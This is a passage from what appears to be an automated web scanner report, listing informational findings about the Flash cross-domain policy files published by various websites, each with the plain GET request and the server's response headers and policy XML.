Accept-Ranges: bytes
ETag: "cfd8f49caeca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:41:55 GMT
Connection: close
Content-Length: 467

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="www.hostesscakes.com" /><allow-access-from domain="hostesscakes.com" />
...[SNIP]...
<allow-access-from domain="hostess" /><allow-access-from domain="hostesscakes.br-lab.com" />
...[SNIP]...

7.347. http://www.indianagazette.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indianagazette.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.indianagazette.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2082100
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 03:37:00 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0587
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: indianagazette.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.348. http://www.jimmyjohns.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jimmyjohns.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jimmyjohns.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 27 Aug 2007 16:22:09 GMT
Accept-Ranges: bytes
ETag: "e2ee9b6ac6e8c71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:36:35 GMT
Connection: close
Content-Length: 279

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.jimmyjohns.com" />

...[SNIP]...
<allow-access-from domain="public.jimmyjohns.com" />
...[SNIP]...

7.349. http://www.lomography.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lomography.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lomography.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 04:04:04 GMT
Content-Type: text/xml
Connection: close
Content-Length: 224
Last-Modified: Thu, 17 Feb 2011 11:43:15 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="uploads.lomography.com" />
...[SNIP]...

7.350. http://www.lompocrecord.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lompocrecord.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lompocrecord.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2077564
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 02:03:39 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0506
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: lompocrecord.com
X-TNCMS-Served-By: cmsapp15
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.351. http://www.marinas.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marinas.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marinas.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 10 Mar 2010 21:08:26 GMT
ETag: "d4b10f9-254-48178b2ffa680"
Accept-Ranges: bytes
Content-Length: 596
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.marinas.com" />

...[SNIP]...
<allow-access-from domain="marinas.com" />
<allow-access-from domain="www.images.marinas.com" />
<allow-access-from domain="images.marinas.com" />
<allow-access-from domain="www.marinafinder.com" />
<allow-access-from domain="marinafinder.com" />
<allow-access-from domain="www.marineprints.com" />
    <allow-access-from domain="marineprints.com" />
...[SNIP]...

7.352. http://www.marlincrawler.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marlincrawler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marlincrawler.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:52:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.16
Last-Modified: Mon, 03 Jan 2011 07:18:59 GMT
ETag: "1f41273-d5-498ebf7349ec0"
Accept-Ranges: bytes
Content-Length: 213
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:52:22 GMT
Connection: close
Content-Type: application/xml

...<cross-domain-policy>
<allow-access-from domain="marlincrawler.com" />
<allow-access-from domain="www.marlincrawler.com" />
<allow-access-from domain="board.marlincrawler.com" />
</cross-d
...[SNIP]...

7.353. http://www.marriottvacationclub.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriottvacationclub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marriottvacationclub.com

Response

HTTP/1.0 200 OK
Content-Length: 138
Content-Type: text/xml
Last-Modified: Thu, 10 Mar 2011 15:11:26 GMT
Accept-Ranges: bytes
ETag: "1496c06c35dfcb1:4eb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:03:55 GMT
Connection: close
Via: 1.1 mcoatprdslb2 (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)
Set-Cookie: rl-sticky-key=0ace8f43; path=/; expires=Wed, 04 May 2011 01:08:57 GMT

<?xml version="1.0"?>

<cross-domain-policy>

<allow-access-from domain="api.everyscape.com" />

</cross-domain-policy>


7.354. http://www.mrclean.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrclean.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mrclean.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:31:31 GMT
ETag: W/"276-1300876182000"
Last-Modified: Wed, 23 Mar 2011 10:29:42 GMT
Content-Type: application/xml
Content-Length: 276
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="http://media.mrclean.com" />
<allow-access-from domain="media.mrclean.com" />
...[SNIP]...

7.355. http://www.mypicturetown.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mypicturetown.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mypicturetown.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:26 GMT
Server: Apache
Last-Modified: Mon, 25 Oct 2010 05:08:34 GMT
ETag: "9ba6d-1415-fbe85880"
Accept-Ranges: bytes
Content-Length: 5141
Connection: close
Content-Type: text/xml
Set-Cookie: BIGipServerga_www_http_pool=2081794240.20480.0000; expires=Sat, 01-May-2021 01:28:04 GMT; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- for pixie -->
<allow-access-from domain="pixie.blogdeco.jp" />
<allow-access-from domain="pixie-dev.blogdeco.jp" />
...[SNIP]...
<allow-access-from domain="nikonmypic.vo.llnwd.net" />
...[SNIP]...
<allow-access-from domain="www.st1.ncstagingmpt.com" />
<allow-access-from domain="myp.st1.ncstagingmpt.com" />
<allow-access-from domain="myphoto.st1.ncstagingmpt.com" />
<allow-access-from domain="pmv.st1.ncstagingmpt.com" />
<allow-access-from domain="img.st1.ncstagingmpt.com" />
<allow-access-from domain="img-org.st1.ncstagingmpt.com" />
<allow-access-from domain="res.st1.ncstagingmpt.com" />
<allow-access-from domain="a01-b01.st1.ncstagingmpt.com" />
<allow-access-from domain="f01-f02.st1.ncstagingmpt.com" />
<allow-access-from domain="webf.st1.ncstagingmpt.com" />
...[SNIP]...
<allow-access-from domain="myp.mypicturetown.com" />
<allow-access-from domain="myphoto.mypicturetown.com" />
<allow-access-from domain="pmv.mypicturetown.com" />
<allow-access-from domain="pmv.mptservice.jp" />
<allow-access-from domain="img.mypicturetown.com" />
<allow-access-from domain="img-org.mypicturetown.com" />
<allow-access-from domain="res.mypicturetown.com" />
<allow-access-from domain="a01.mypicturetown.com" />
<allow-access-from domain="a02.mypicturetown.com" />
<allow-access-from domain="a03.mypicturetown.com" />
<allow-access-from domain="a04.mypicturetown.com" />
<allow-access-from domain="a05.mypicturetown.com" />
<allow-access-from domain="a06.mypicturetown.com" />
<allow-access-from domain="b01.mypicturetown.com" />
<allow-access-from domain="b02.mypicturetown.com" />
<allow-access-from domain="b03.mypicturetown.com" />
<allow-access-from domain="b04.mypicturetown.com" />
<allow-access-from domain="b05.mypicturetown.com" />
<allow-access-from domain="b06.mypicturetown.com" />
<allow-access-from domain="f01.mypicturetown.com" />
<allow-access-from domain="f02.mypicturetown.com" />
<allow-access-from domain="f03.mypicturetown.com" />
<allow-access-from domain="a01-b01.mypicturetown.com" />
<allow-access-from domain="a02-b02.mypicturetown.com" />
<allow-access-from domain="a03-b03.mypicturetown.com" />
<allow-access-from domain="a04-b04.mypicturetown.com" />
<allow-access-from domain="a05-b05.mypicturetown.com" />
<allow-access-from domain="a06-b06.mypicturetown.com" />
<allow-access-from domain="a01-f01.mypicturetown.com" />
<allow-access-from domain="a01-f02.mypicturetown.com" />
<allow-access-from domain="a01-f03.mypicturetown.com" />
<allow-access-from domain="b01-f01.mypicturetown.com" />
<allow-access-from domain="b01-f02.mypicturetown.com" />
<allow-access-from domain="b01-f03.mypicturetown.com" />
<allow-access-from domain="a02-f01.mypicturetown.com" />
<allow-access-from domain="a02-f02.mypicturetown.com" />
<allow-access-from domain="a02-f03.mypicturetown.com" />
<allow-access-from domain="b02-f01.mypicturetown.com" />
<allow-access-from domain="b02-f02.mypicturetown.com" />
<allow-access-from domain="b02-f03.mypicturetown.com" />
<allow-access-from domain="a03-f01.mypicturetown.com" />
<allow-access-from domain="a03-f02.mypicturetown.com" />
<allow-access-from domain="a03-f03.mypicturetown.com" />
<allow-access-from domain="b03-f01.mypicturetown.com" />
<allow-access-from domain="b03-f02.mypicturetown.com" />
<allow-access-from domain="b03-f03.mypicturetown.com" />
<allow-access-from domain="a04-f01.mypicturetown.com" />
<allow-access-from domain="a04-f02.mypicturetown.com" />
<allow-access-from domain="a04-f03.mypicturetown.com" />
<allow-access-from domain="b04-f01.mypicturetown.com" />
<allow-access-from domain="b04-f02.mypicturetown.com" />
<allow-access-from domain="b04-f03.mypicturetown.com" />
<allow-access-from domain="a05-f01.mypicturetown.com" />
<allow-access-from domain="a05-f02.mypicturetown.com" />
<allow-access-from domain="a05-f03.mypicturetown.com" />
<allow-access-from domain="b05-f01.mypicturetown.com" />
<allow-access-from domain="b05-f02.mypicturetown.com" />
<allow-access-from domain="b05-f03.mypicturetown.com" />
<allow-access-from domain="a06-f01.mypicturetown.com" />
<allow-access-from domain="a06-f02.mypicturetown.com" />
<allow-access-from domain="a06-f03.mypicturetown.com" />
<allow-access-from domain="b06-f01.mypicturetown.com" />
<allow-access-from domain="b06-f02.mypicturetown.com" />
<allow-access-from domain="b06-f03.mypicturetown.com" />
<allow-access-from domain="f01-f02.mypicturetown.com" />
<allow-access-from domain="f01-f03.mypicturetown.com" />
<allow-access-from domain="f02-f01.mypicturetown.com" />
<allow-access-from domain="f02-f03.mypicturetown.com" />
<allow-access-from domain="f03-f02.mypicturetown.com" />
<allow-access-from domain="f03-f01.mypicturetown.com" />
<allow-access-from domain="webf.mypicturetown.com" />
...[SNIP]...

7.356. http://www.myrecordjournal.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myrecordjournal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myrecordjournal.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2047208
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 01:11:54 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0388
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: myrecordjournal.com
X-TNCMS-Served-By: cmsapp6
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.357. http://www.nextgenboards.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextgenboards.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nextgenboards.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:56:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 23 Nov 2010 00:47:14 GMT
ETag: "47e8011-172-495adb6b46880"
Accept-Ranges: bytes
Content-Length: 370
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="x.mochiads.com" />
<allow-access-from domain="www.mochiads.com" />
<allow-access-from domain="x.mochimedia.com" />
<allow-access-from domain="www.mochimedia.com" />
...[SNIP]...

7.358. http://www.nobelcom.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nobelcom.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nobelcom.com

Response

HTTP/1.0 200 OK
Server: Resin/3.0.24
ETag: "8BQIYLA3Ggn"
Last-Modified: Wed, 13 Aug 2008 12:51:49 GMT
Accept-Ranges: bytes
Cache-Control: max-age=5
Expires: Wed, 04 May 2011 01:07:48 GMT
Set-Cookie: JSESSIONID=abcadCyDmUUpfguF9I4_s; domain=.nobelcom.com; path=/
Content-Type: text/xml
Content-Length: 193
Date: Wed, 04 May 2011 01:07:43 GMT

<cross-domain-policy>
<allow-access-from domain="www.nobelcom.com" />
<allow-access-from domain="nobelcom.com" />
<allow-access-from domain="a1423.g.akamai.net"/>
</cross-domain-policy>


7.359. http://www.ntpapull.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ntpapull.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ntpapull.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:12:02 GMT
Server: Apache
Last-Modified: Thu, 02 Apr 2009 19:23:16 GMT
Accept-Ranges: bytes
Content-Length: 188
Vary: Accept-Encoding,User-Agent
X-Powered-By: ASP.NET 2.0
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="www.ntpapull.com" />
<allow-access-from domain="ntpapull.com" />
<allow-access-from domain="dev.ntpapull.com" />
</cross-domain-policy>

7.360. http://www.omniture.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.omniture.com

Response

HTTP/1.0 200 OK
Server: Omniture AWS/2.0.0
Last-Modified: Wed, 18 Aug 2010 04:52:06 GMT
ETag: "232409b-280-d3cf2980"
Accept-Ranges: bytes
Content-Length: 640
xserver: www5.dmz
Content-Type: application/xml
Date: Wed, 04 May 2011 03:21:05 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.omniture.com" />
<allow-access-from domain="www.staging.omniture.com" />
<allow-access-from domain="assets.omniture.com" />
<allow-access-from domain="style.omniture.com" />
<allow-access-from domain="scripts.omniture.com" />
<allow-access-from domain="events.omniture.com" />
<allow-access-from domain="thelink.omniture.com" />
<allow-access-from domain="s7qa-appsdev.macromedia.com" />
<allow-access-from domain="s7qa-apps.macromedia.com" />
...[SNIP]...

7.361. http://www.overnightprints.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overnightprints.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.overnightprints.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:42:30 GMT
Server: Apache
Last-Modified: Fri, 26 Feb 2010 01:39:53 GMT
ETag: "323639d-cd-48076f9d7ac40"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="overnightprints.com"/>
<allow-access-from domain="www.overnightprints.com"/>

<allow-access-from domain="media.overnightprints.com"/>
</cross-domain-po
...[SNIP]...

7.362. http://www.pecentral.org/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pecentral.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pecentral.org

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 03:40:53 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Wed, 02 Sep 2009 11:36:12 GMT
ETag: "d0d1d892c12bca1:b20"
Content-Length: 523

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="www.pecentral.org" />    <allow-access-from domain="test.pecentral.org" /> <allow-access-from domain="pecentral.org" />    <allow-access-from domain="peclogit.org" />    <allow-access-from domain="www.peclogit.org" />    <allow-access-from domain="www.pecchallenge.org" />    <allow-access-from domain="pecchallenge.org" />
...[SNIP]...

7.363. http://www.pewforum.org/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pewforum.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pewforum.org

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 462
Content-Type: text/xml
Last-Modified: Mon, 17 May 2010 06:04:26 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:17:07 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="staging.pewforum.q-industries.com"/>
   <allow-access-from domain="pewforum.q-industries.com"/>
   <allow-access-from domain="www.pewforum.org"/>
   <si
...[SNIP]...

7.364. http://www.quintura.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quintura.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.quintura.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:19:06 GMT
Content-Type: text/xml
Content-Length: 1138
Last-Modified: Thu, 15 Apr 2010 07:01:00 GMT
Connection: close
Expires: Thu, 05 May 2011 01:19:06 GMT
Cache-Control: max-age=86400
Set-Cookie: PARTNERCOOK=Wd7VYk3AqYpWsBfIA1pBAg==; expires=Thu, 03-May-12 01:19:06 GMT; domain=quintura.com; path=/
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="community.quintura.com" to-ports="*" secure="false"/>
   <allow-access-from domain="www.community.quintura.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="affiliates.quintura.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.affiliates.quintura.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="quintura.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="quintura.ru" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.quintura.ru" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="flash.inside.quintura.ru" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="eng.inside.quintura.ru" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="rus.inside.quintura.ru" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="aff.inside.quintura.ru" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="affrc.inside.quintura.ru" to-ports="*" secure="false"/>
...[SNIP]...

7.365. http://www.rockbet.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockbet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rockbet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:04:49 GMT
Server: Apache
Last-Modified: Tue, 23 Nov 2010 18:36:37 GMT
Accept-Ranges: bytes
Content-Length: 374
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="get.rockbet.com" />
<allow-access-from domain="rockbet.com" />
...[SNIP]...
<allow-access-from domain="cdn.rivalpowered.com" />
...[SNIP]...

7.366. http://www.rollingout.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rollingout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rollingout.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/xml
Date: Wed, 04 May 2011 01:21:35 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-hppgikmp=1F885929C935B37E062F48FF6C2D5071; path=/
Last-Modified: Sat, 22 Jan 2011 17:56:08 GMT
Content-Length: 377

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;" />
<allow-access-from domain="&lt;cross-domain-policy&gt;" />
<allow-access-from domain="&lt;allow-access-from domain=&quot;&quot; /&gt;" />
<allow-access-from domain="&lt;/cross-domain-policy&gt;" />
...[SNIP]...

7.367. http://www.sanjuan.edu/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sanjuan.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sanjuan.edu

Response

HTTP/1.1 200 OK
Content-Length: 226
Content-Type: text/xml
Content-Location: http://www.sanjuan.edu/crossdomain.xml
Last-Modified: Fri, 25 May 2007 16:48:50 GMT
Accept-Ranges: bytes
ETag: "2d3efc91ec9ec71:16d1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:47:09 GMT
Connection: close


<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.myteacherpages.com" />

...[SNIP]...

7.368. http://www.scholarshipprovider.net/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scholarshipprovider.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scholarshipprovider.net

Response

HTTP/1.1 200 OK
